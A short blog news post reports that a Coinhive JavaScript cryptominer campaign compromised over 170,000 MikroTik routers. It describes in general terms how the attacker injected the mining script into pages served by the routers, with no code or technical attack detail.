The Coinhive Miner virus has infected hundreds of thousands MikroTik routers. The malware has now reportedly installed a JavaScript miner to over 170,000 devices and this recent outbreak is believed to be getting bigger and bigger.
The first hint of attacks was discovered by researcher who goes by the nickname MalwareHunterBR and who tweeted, that the miner has started to spread at an alarming rate. In addition to this, news have also broken out that the first stages of the attack compromised about 70 thousand routers alone.
What is Behind Coinhive’s Infection Success
What is believed is that the hacker may have used one of the exploits for MikroTik devices to perform a zero-day type of attack through one device and then in the device drop a copy of the Coinhive library. This library is also in all of the pages which are displayed by the router, making all of the devices connected to it vulnerable.
And furthermore, since the zero day has been exploited by using only one Coinhive key for all of the injections performed by cooinhive via the past week, it is belived that only one attacker is behind the attack.
In addition, researchers also claim that non-MikroTik users were also among the victims, because some of the Internet Service providers have used MikroTik devices via their main network and since the hacker has injected the JavaScript code, this attack has spread to all of the devices that are logically connected to the MikroTik routers that are compromised.
The injection has worked with a tremendous success because of the fact how the attack is done and the fact that the infection process has succeeded in obtaining incomingand outgoing traffic control successfully.
No comments:
Post a Comment